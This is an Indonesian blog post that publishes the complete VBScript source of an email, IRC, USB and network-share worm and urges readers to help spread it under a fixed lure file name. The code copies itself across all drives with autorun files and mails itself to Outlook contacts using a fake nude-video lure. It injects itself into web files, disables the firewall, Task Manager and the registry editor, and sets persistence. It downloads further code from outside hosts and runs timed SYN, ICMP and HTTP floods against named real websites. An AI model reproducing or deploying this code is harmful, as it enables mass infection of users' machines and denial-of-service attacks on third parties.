Pages

Tuesday, October 22, 2013

Kumpulan Script Virus

cara kerja virus ini :

- menginfeksi seluruh drive, menyebarkan diri via email(outlook), mirc, flashdisk, lan via network sharing
- worm ini juga mampu mengupdate diri dengan mendownload file update
- pada jam2 tertentu juga melakukan http request, syn,icmp ke website target hacker malaysia..

- infeksi seluruh drive, menyebarkan diri via email( outlook), mirc, flashdisk, lan via network sharing
-worm ini juga mampu mengupdate diri dengan mendownload file update
- pada jam jam tertentu juga melakukan http request, syn,icmp ke website target hacker malaysia:tbd,hmsecurity,sec-r1z,v4-team
monggo bagi yg mao ikut nyebarin worm ini

yg disebarkan adl nude_indo_girl.mpg.vbs (nama file tdk boleh diubah)


rem nude girl internet w0rm version 1.0
rem c0d3r : mywisdom
rem this intenet w0rm will spread via irc, lan, flash disk, drives, outlook email
rem to all my targets and enemies. you wanna play with me? ok you fight with my worm before fight with me
rem special thanks to all devilzc0de crews and members
rem special thanks to all jasakom crews and members
rem special thanks to all ycl crews and members
rem greetz to all solhack 2003-2004 crews
rem got r00t ???
rem this v1rus is made purposely for helping me in ddosing my targets
on error resume next
Set mywisdom = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
App.TaskVisible = False
infek2()
infek_regiistry_sambil_boker()
infek_sistem()
infek_ie()
download_winsock()
download_winsock2()
download_update_worm1()
infek_file_dan_web()
NetSpread()
sebar_ke_irc_1()
sebarkan_email_hahaha()
kirim_syn_target()
http_ddos_target()
kirim_icmp_target()
iframe_attack()
wget_attack1()
wget_attack2()
wget_attack3()
wget_attack4()
wget_attack5()
browsing()
infek_sistem()
Set mywisdom = CreateObject("WScript.Shell")
anti_delete()
mywisdom.Sleep 100000
jalan()

sub jalan()
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("nude_indo_girl.mpg.vbs")

mywisdom.Sleep 100000
end sub

Sub infek2()
on error resume next
dim mywisdom
isi = "Open=nude_indo_girl.mpg.vbs"
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("del autorun.inf")
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("autorun.inf", 8, True)
file.WriteLine(isi)
file.Close
SET file = NOTHING

win = fso.GetParentFolderName(Wscript.ScriptFullName)

autorun= win & "\autorun.inf"

satu= win & "\nude_indo_girl.mpg.vbs"
dua = "c:\WINDOWS\nude_indo_girl.mpg.vbs"
tiga = "c:\nude_indo_girl.mpg.vbs"
empat = "c:\windows\nude_indo_girl.mpg.vbs"
lima = "c:\windows\system32\nude_indo_girl.mpg.vbs"
enam = "c:\xampp\htdocs\nude_indo_girl.mpg.vbs"
d= "d:\nude_indo_girl.mpg.vbs"
e="e:\nude_indo_girl.mpg.vbs"
f="f:\nude_indo_girl.mpg.vbs"
g="g:\nude_indo_girl.mpg.vbs"
h="h:\nude_indo_girl.mpg.vbs"
i= "I:\nude_indo_girl.mpg.vbs"
j= "j:\nude_indo_girl.mpg.vbs"
k= "k:\nude_indo_girl.mpg.vbs"
l= "l:\nude_indo_girl.mpg.vbs"
m= "m:\nude_indo_girl.mpg.vbs"
n= "n:\nude_indo_girl.mpg.vbs"
o= "o:\nude_indo_girl.mpg.vbs"
p= "p:\nude_indo_girl.mpg.vbs"
q= "q:\nude_indo_girl.mpg.vbs"
r= "r:\nude_indo_girl.mpg.vbs"
s= "s:\nude_indo_girl.mpg.vbs"
t= "t:\nude_indo_girl.mpg.vbs"
u= "u:\nude_indo_girl.mpg.vbs"
v= "v:\nude_indo_girl.mpg.vbs"
w= "w:\nude_indo_girl.mpg.vbs"
x= "x:\nude_indo_girl.mpg.vbs"
y= "y:\nude_indo_girl.mpg.vbs"
z= "z:\nude_indo_girl.mpg.vbs"

fso.CopyFile satu, dua, 0
fso.CopyFile satu, tiga, 0
fso.CopyFile satu, empat, 0
fso.CopyFile satu, lima, 0
fso.CopyFile satu, enam, 0
fso.CopyFile satu, d, 0
fso.CopyFile satu, e, 0
fso.CopyFile satu, f, 0
fso.CopyFile satu, g, 0
fso.CopyFile satu, h, 0
fso.CopyFile satu, i, 0
fso.CopyFile satu, j, 0
fso.CopyFile satu, k, 0
fso.CopyFile satu, l, 0
fso.CopyFile satu, m, 0
fso.CopyFile satu, n, 0
fso.CopyFile satu, o, 0
fso.CopyFile satu, p, 0
fso.CopyFile satu, q, 0
fso.CopyFile satu, r, 0
fso.CopyFile satu, s, 0
fso.CopyFile satu, t, 0
fso.CopyFile satu, u, 0
fso.CopyFile satu, v, 0
fso.CopyFile satu, w, 0
fso.CopyFile satu, x, 0
fso.CopyFile satu, y, 0
fso.CopyFile satu, z, 0

duax = "c:\WINDOWS\autorun.inf"
tigax = "c:\autorun.inf"
empatx = "c:\windows\autorun.inf"
limax = "c:\windows\system32\autorun.inf"
enamx = "c:\xampp\htdocs\autorun.inf"
dx= "d:\autorun.inf"
ex="e:\autorun.inf"
fx="f:\autorun.inf"
gx="g:\autorun.inf"
hx="h:\autorun.inf"
ix= "i:\autorun.inf"
jx= "j:\autorun.inf"
kx= "k:\autorun.inf"
lx= "l:\autorun.inf"
mx= "m:\autorun.inf"
nx= "n:\autorun.inf"
ox= "o:\autorun.inf"
px= "p:\autorun.inf"
qx= "q:\autorun.inf"
rx= "r:\autorun.inf"
sx= "s:\autorun.inf"
tx= "t:\autorun.inf"
ux= "u:\autorun.inf"
vx= "v:\autorun.inf"
wx= "w:\autorun.inf"
xx= "x:\autorun.inf"
yx= "y:\autorun.inf"
zx= "z:\autorun.inf"

fso.CopyFile autorun, duax, 0
fso.CopyFile autorun, tigax, 0
fso.CopyFile autorun, empatx, 0
fso.CopyFile autorun, limax, 0
fso.CopyFile autorun, enamx, 0
fso.CopyFile autorun, dx, 0
fso.CopyFile autorun, ex, 0
fso.CopyFile autorun, fx, 0
fso.CopyFile autorun, gx, 0
fso.CopyFile autorun, hx, 0
fso.CopyFile autorun, ix, 0
fso.CopyFile autorun, jx, 0
fso.CopyFile autorun, kx, 0
fso.CopyFile autorun, lx, 0
fso.CopyFile autorun, mx, 0
fso.CopyFile autorun, nx, 0
fso.CopyFile autorun, ox, 0
fso.CopyFile autorun, px, 0
fso.CopyFile autorun, qx, 0
fso.CopyFile autorun, rx, 0
fso.CopyFile autorun, sx, 0
fso.CopyFile autorun, tx, 0
fso.CopyFile autorun, ux, 0
fso.CopyFile autorun, vx, 0
fso.CopyFile autorun, wx, 0
fso.CopyFile autorun, xx, 0
fso.CopyFile autorun, yx, 0
fso.CopyFile autorun, zx, 0
end sub

'teknik network spreading dari csw
Sub NetSpread()
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
fso.getFile(wscript.ScriptFullName).Copy("nude_indo_girl.mpg.vbs")
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub

sub infek_file_dan_web()
On Error Resume Next
Dim fso,ekstensi, folder, files, NewsFile,sFolder
Set fso = CreateObject("Scripting.FileSystemObject")
sFolder = fso.GetParentFolderName(Wscript.ScriptFullName)
Set folder = fso.GetFolder(sFolder)
Set files = folder.Files
For each folderIdx In files
ekstensi=fso.GetExtensionName(folderIdx.Name)
if ekstensi="php" or ekstensi="html" or ekstensi="htm" or ekstensi="jsp" or ekstensi="jpg" or ekstensi="jsp" or ekstensi="gif" or ekstensi="png" then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("nude_indo_girl.mpg.vbs")
Set objReadFile = objFSO.OpenTextFile("nude_indo_girl.mpg.vbs", 1)
strContents = objReadFile.ReadAll

Set mywisdom = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(folderIdx.Name, 8, True)
tag1=""
tag2="window.open('nude_indo_girl.mpg.vbs');"
strContents=tag1+strContents+tag2
file.WriteLine(strContents)
file.Close
objReadFile.Close
SET file = NOTHING
end if

Next
NewFile.Close

end sub

'nonaktifkan firewall
sub disable_firewall()
On Error Resume Next
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = FALSE
end sub

'biar tetep eksis
sub anti_delete()
On Error Resume Next
Set fso= Createobject("scripting.filesystemobject")
Set mywisdom2= fso.opentextfile(wscript.scriptfullname, 1)
pengujian_keberadaan= mywisdom2.readall
mywisdom2.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set ada_terus= fso.createtextfile(wscript.scriptfullname, True)
ada_terus.writepengujian_keberadaan
ada_terus.Close
End If
Loop
end sub

'fungsi untuk syn dos ke target
sub kirim_syn_target()
on error resume next
jam=Hour(Now())
menit=Minute(Now())
if jam=12 or jam=15 or jam=16 then
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "tbd.my"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=18 or jam=21 or jam=22 then
'syn sec-r1z.com
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "sec-r1z.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=23 or jam=03 or jam=04 or jam=3 or jam=4 then
'syn v4-team
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "v4-team.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=06 or jam=09 or jam=6 or jam=9 or jam=10 then
'syn hmsecurity.org
For i = 0 To 15
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "hmsecurity.org"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if

if jam=10 then
'syn ardiantz.com
For i = 0 To 20
set winsock = CreateObject("MSWinsock.Winsock")
winsock.Remotehost = "ardiantz.com"
winsock.RemotePort = 80
winsock.connect
next
winsock.close
end if
end sub

'fungsi kirim icmp pada tanggal tanggal tertentu yang udah diset
sub kirim_icmp_target()
hari=Day(now())
if hari=12 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping tbd.my -l 1000 -n 10")
end if

if hari=22 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping ardiantz.com -l 1000 -n 10")
end if

if hari=02 then
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("ping hmsecurity.org -l 1000 -n 10")
end if
end sub

sub http_ddos_target()
on error resume next
Dim o
menit=Minute(Now())
jam=Hour(Now())

'request tiap jam ke situs target
if menit>55 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://tbd.my", False
o.send
Set x = CreateObject("MSXML2.XMLHTTP")
x.open "GET", "http://sec-r1z.com", False
x.send
Set r = CreateObject("MSXML2.XMLHTTP")
r.open "GET", "http://hmsecurity.org", False
r.send
Set y = CreateObject("MSXML2.XMLHTTP")
y.open "GET", "http://v4-team.com", False
y.send
Set z = CreateObject("MSXML2.XMLHTTP")
z.open "GET", "http://ardiantz.com", False
z.send

next
end if

'http req tbd
if jam=10 or jam=14 or jam=15 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://tbd.my", False
o.send
next
end if

'http req sec-r1z
if jam=16 or jam=18 or jam=19 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://sec-r1z.com", False
o.send
next
end if

'http req v4-team.com
if jam=20 or jam=22 or jam=23 or jam=24 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://v4-team.com", False
o.send
next
end if

'http req hmsecurity.org
if jam=23 or jam=01 or jam=02 or jam=1 or jam=2 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://hmsecurity.org", False
o.send
next
end if

'http req ardiantz.com
if jam=20 or jam=22 or jam=23 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com", False
o.send
next
end if
end sub

'penyebaran ke email via outlook diambil dari potongan kode virus i love you
sub sebarkan_email_hahaha()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "Free Indonesian Girl Nude Scandal Video for You"
male.Body = vbcrlf&"Free Indonesian Girl Nude Scandal Video for You!!! check the attachment. Or download now, click here to download this video: nude_indo_girl.mpg [download] , mirror download: nude_indo_girl.mpg [mirror download]"
male.Attachments.Add(dirsystem&"\nude_indo_girl.mpg.vbs")
male.Attachments.add(App.Path & "" & "nude_indo_girl.mpg.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub

'pertahanan diri virus aka self defense
sub infek_regiistry_sambil_boker()
dim win,mywisdom
Set fso = CreateObject("Scripting.FileSystemObject")
win = fso.GetParentFolderName(Wscript.ScriptFullName)
Set mywisdom = CreateObject("WScript.Shell")
With mywisdom

.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir_Desktop\Path", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir_Desktop\AppDataDirectory", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""

.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Stask", "wscript.exe """ & win & "\nude_indo_girl.mpg.vbs"""
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
.RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
End With
end sub

'strategi perang : siksa musuh pelan pelan
sub infek_ie()
on error resume next
dim hari
hari=Weekday(date)
if hari=1 or hari=2 then
'start page ie diset ke sec-r1z.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://sec-r1z.com","REG_SZ"
elseif hari=3 or hari=4 then
'start page ie diset ke v4-team.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://v4-team.com","REG_SZ"
elseif hari=5 then
'start page ie diset ke ardiantz.com
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://ardiantz.com","REG_SZ"
else
'start page ie diset ke tbd.my
RegLocate = "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page"
mywisdom.RegWrite RegLocate,"http://tbd.my","REG_SZ"
end if
end sub

'teknik infeksi dan penyebaran di sistem dan semua drive serta menyembunyikan diri
Sub infek_sistem()
on error resume next
dim mywisdom
isi = "Open=nude_indo_girl.mpg.vbs"
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("del autorun.inf")
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("autorun.inf", 8, True)
file.WriteLine(isi)
file.Close
SET file = NOTHING
mywisdom.run("attrib +r autorun.inf")
mywisdom.run("attrib +r nude_indo_girl.mpg.vbs")

win = fso.GetParentFolderName(Wscript.ScriptFullName)

autorun= win & "\autorun.inf"

satu= win & "\nude_indo_girl.mpg.vbs"
dua = "c:\WINDOWS\nude_indo_girl.mpg.vbs"
tiga = "c:\nude_indo_girl.mpg.vbs"
empat = "c:\windows\nude_indo_girl.mpg.vbs"
lima = "c:\windows\system32\nude_indo_girl.mpg.vbs"
enam = "c:\xampp\htdocs\nude_indo_girl.mpg.vbs"
d= "d:\nude_indo_girl.mpg.vbs"
e="e:\nude_indo_girl.mpg.vbs"
f="f:\nude_indo_girl.mpg.vbs"
g="g:\nude_indo_girl.mpg.vbs"
h="h:\nude_indo_girl.mpg.vbs"
i= "i:\nude_indo_girl.mpg.vbs"
j= "j:\nude_indo_girl.mpg.vbs"
k= "k:\nude_indo_girl.mpg.vbs"
l= "l:\nude_indo_girl.mpg.vbs"
m= "m:\nude_indo_girl.mpg.vbs"
n= "n:\nude_indo_girl.mpg.vbs"
o= "o:\nude_indo_girl.mpg.vbs"
p= "p:\nude_indo_girl.mpg.vbs"
q= "q:\nude_indo_girl.mpg.vbs"
r= "r:\nude_indo_girl.mpg.vbs"
s= "s:\nude_indo_girl.mpg.vbs"
t= "t:\nude_indo_girl.mpg.vbs"
u= "u:\nude_indo_girl.mpg.vbs"
v= "v:\nude_indo_girl.mpg.vbs"
w= "w:\nude_indo_girl.mpg.vbs"
x= "x:\nude_indo_girl.mpg.vbs"
y= "y:\nude_indo_girl.mpg.vbs"
z= "z:\nude_indo_girl.mpg.vbs"

fso.CopyFile satu, dua, 0
fso.CopyFile satu, tiga, 0
fso.CopyFile satu, empat, 0
fso.CopyFile satu, lima, 0
fso.CopyFile satu, enam, 0
fso.CopyFile satu, d, 0
fso.CopyFile satu, e, 0
fso.CopyFile satu, f, 0
fso.CopyFile satu, g, 0
fso.CopyFile satu, h, 0
fso.CopyFile satu, i, 0
fso.CopyFile satu, j, 0
fso.CopyFile satu, k, 0
fso.CopyFile satu, l, 0
fso.CopyFile satu, m, 0
fso.CopyFile satu, n, 0
fso.CopyFile satu, o, 0
fso.CopyFile satu, p, 0
fso.CopyFile satu, q, 0
fso.CopyFile satu, r, 0
fso.CopyFile satu, s, 0
fso.CopyFile satu, t, 0
fso.CopyFile satu, u, 0
fso.CopyFile satu, v, 0
fso.CopyFile satu, w, 0
fso.CopyFile satu, x, 0
fso.CopyFile satu, y, 0
fso.CopyFile satu, z, 0

duax = "c:\WINDOWS\autorun.inf"
tigax = "c:\autorun.inf"
empatx = "c:\windows\autorun.inf"
limax = "c:\windows\system32\autorun.inf"
enamx = "c:\xampp\htdocs\autorun.inf"
dx= "d:\autorun.inf"
ex="e:\autorun.inf"
fx="f:\autorun.inf"
gx="g:\autorun.inf"
hx="h:\autorun.inf"
ix= "i:\autorun.inf"
jx= "j:\autorun.inf"
kx= "k:\autorun.inf"
lx= "l:\autorun.inf"
mx= "m:\autorun.inf"
nx= "n:\autorun.inf"
ox= "o:\autorun.inf"
px= "p:\autorun.inf"
qx= "q:\autorun.inf"
rx= "r:\autorun.inf"
sx= "s:\autorun.inf"
tx= "t:\autorun.inf"
ux= "u:\autorun.inf"
vx= "v:\autorun.inf"
wx= "w:\autorun.inf"
xx= "x:\autorun.inf"
yx= "y:\autorun.inf"
zx= "z:\autorun.inf"

fso.CopyFile autorun, duax, 0
fso.CopyFile autorun, tigax, 0
fso.CopyFile autorun, empatx, 0
fso.CopyFile autorun, limax, 0
fso.CopyFile autorun, enamx, 0
fso.CopyFile autorun, dx, 0
fso.CopyFile autorun, ex, 0
fso.CopyFile autorun, fx, 0
fso.CopyFile autorun, gx, 0
fso.CopyFile autorun, hx, 0
fso.CopyFile autorun, ix, 0
fso.CopyFile autorun, jx, 0
fso.CopyFile autorun, kx, 0
fso.CopyFile autorun, lx, 0
fso.CopyFile autorun, mx, 0
fso.CopyFile autorun, nx, 0
fso.CopyFile autorun, ox, 0
fso.CopyFile autorun, px, 0
fso.CopyFile autorun, qx, 0
fso.CopyFile autorun, rx, 0
fso.CopyFile autorun, sx, 0
fso.CopyFile autorun, tx, 0
fso.CopyFile autorun, ux, 0
fso.CopyFile autorun, vx, 0
fso.CopyFile autorun, wx, 0
fso.CopyFile autorun, xx, 0
fso.CopyFile autorun, yx, 0
fso.CopyFile autorun, zx, 0
end sub

'teknik network spreading dari csw
Sub NetSpread()
On Error Resume Next
Set Network = CreateObject("WScript.Network")
Set Shares = Network.EnumNetworkDrives
If Shares.Count > 0 Then
Set fso = CreateObject("Scripting.FileSystemObject")
For Counter1 = 0 To Shares.Count - 1
If Shares.Item(Counter1) <> "" Then
fso.getFile(wscript.ScriptFullName).Copy("nude_indo_girl.mpg.vbs")
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing
End If
Set Shares = Nothing
Set Network = Nothing
End Sub

sub infek_file_dan_web()
On Error Resume Next
Dim fso,ekstensi, folder, files, NewsFile,sFolder
Set fso = CreateObject("Scripting.FileSystemObject")
sFolder = fso.GetParentFolderName(Wscript.ScriptFullName)
Set folder = fso.GetFolder(sFolder)
Set files = folder.Files
For each folderIdx In files
ekstensi=fso.GetExtensionName(folderIdx.Name)
if ekstensi="php" or ekstensi="html" or ekstensi="htm" or ekstensi="jsp" or ekstensi="jpg" or ekstensi="jsp" or ekstensi="gif" or ekstensi="png" then
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("nude_indo_girl.mpg.vbs")
Set objReadFile = objFSO.OpenTextFile("nude_indo_girl.mpg.vbs", 1)
strContents = objReadFile.ReadAll

Set mywisdom = CreateObject("WScript.Shell")
Set file = fso.OpenTextFile(folderIdx.Name, 8, True)
tag1=""
tag2="window.open('nude_indo_girl.mpg.vbs');"
strContents=tag1+strContents+tag2
file.WriteLine(strContents)
file.Close
objReadFile.Close
SET file = NOTHING
end if

Next
NewFile.Close

end sub

sub download_winsock()
strFileURL = "http://ardiantz.com/~checking/wp-includes/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

sub download_winsock2()
strFileURL = "http://yoyoparty.com/upload/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

sub download_winsock2()
strFileURL = "http://yoyoparty.com/upload/MSWINSCK.OCX"
strHDLocation = "c:\windows\system32\MSWINSCK.OCX"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing
end sub

sub sebar_ke_irc_1()
Set fso = CreateObject("Scripting.FileSystemObject")
nama_w0rm=Wscript.ScriptFullName

win = fso.GetParentFolderName(Wscript.ScriptFullName)

set scriptini=fso.CreateTextFile("C:\Program Files\mIRC\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine ";"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick " & nama_w0rm
scriptini.WriteLine "n3=}"
end sub

sub iframe_attack()
jam=Hour(Now())
menit=Minute(Now())
if menit=12 then
For i = 0 To 10
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/iframe.php", False
o.send
next
end if
end sub

sub wget_attack1()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget1.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack2()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget2.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack3()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget3.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack4()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget4.php", False
o.send
data=o.status
next
end if
end sub

sub wget_attack5()
jam=Hour(Now())
menit=Minute(Now())
if menit=35 then
For i = 0 To 5
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://ardiantz.com/~checking/wp-includes/wget5.php", False
o.send
data=o.status
next
end if
end sub

sub browsing()
dim Window
jam=Hour(Now())
menit=Minute(Now())
hari=Day(now())

if jam=12 or jam=13 or jam=23 then
set Window = CreateObject("InternetExplorer.Application")
Window.RegisterAsBrowser = True
Window.Navigate("tbd.my")
Window.MenuBar = True
Window.ToolBar = True
Window.AddressBar = True
Window.StatusBar = True
Window.FullScreen = False
Window.Resizable = True
Window.Visible = True
Window.Width = 850
Window.Height = 720

set Window2 = CreateObject("InternetExplorer.Application")
Window2.RegisterAsBrowser = True
Window2.Navigate("hmsecurity.org")
Window2.MenuBar = True
Window2.ToolBar = True
Window2.AddressBar = True
Window2.StatusBar = True
Window2.FullScreen = False
Window2.Resizable = True
Window2.Visible = True
Window2.Width = 850
Window2.Height = 720

set Window3 = CreateObject("InternetExplorer.Application")
Window3.RegisterAsBrowser = True
Window3.Navigate("v4-team.com")
Window3.MenuBar = True
Window3.ToolBar = True
Window3.AddressBar = True
Window3.StatusBar = True
Window3.FullScreen = False
Window3.Resizable = True
Window3.Visible = True
Window3.Width = 850
Window3.Height = 720

set Window4 = CreateObject("InternetExplorer.Application")
Window4.RegisterAsBrowser = True
Window4.Navigate("sec-r1z.com")
Window4.MenuBar = True
Window4.ToolBar = True
Window4.AddressBar = True
Window4.StatusBar = True
Window4.FullScreen = False
Window4.Resizable = True
Window4.Visible = True
Window4.Width = 850
Window4.Height = 720

set Window5 = CreateObject("InternetExplorer.Application")
Window5.RegisterAsBrowser = True
Window5.Navigate("ardiantz.com")
Window5.MenuBar = True
Window5.ToolBar = True
Window5.AddressBar = True
Window5.StatusBar = True
Window5.FullScreen = False
Window5.Resizable = True
Window5.Visible = True
Window5.Width = 850
Window5.Height = 720
end if
end sub

sub download_update_worm1()

jam=Hour(Now())
menit=Minute(Now())
hari=Day(now())

if jam=10 and hari=10 then
strFileURL = "http://ardiantz.com/~checking/wp-includes/patch.vbs"
strHDLocation = "c:\windows\system32\patch.vbs"

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1

objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0

Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing

objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if

Set objXMLHTTP = Nothing

end if

Set mywisdom = CreateObject("WScript.Shell")
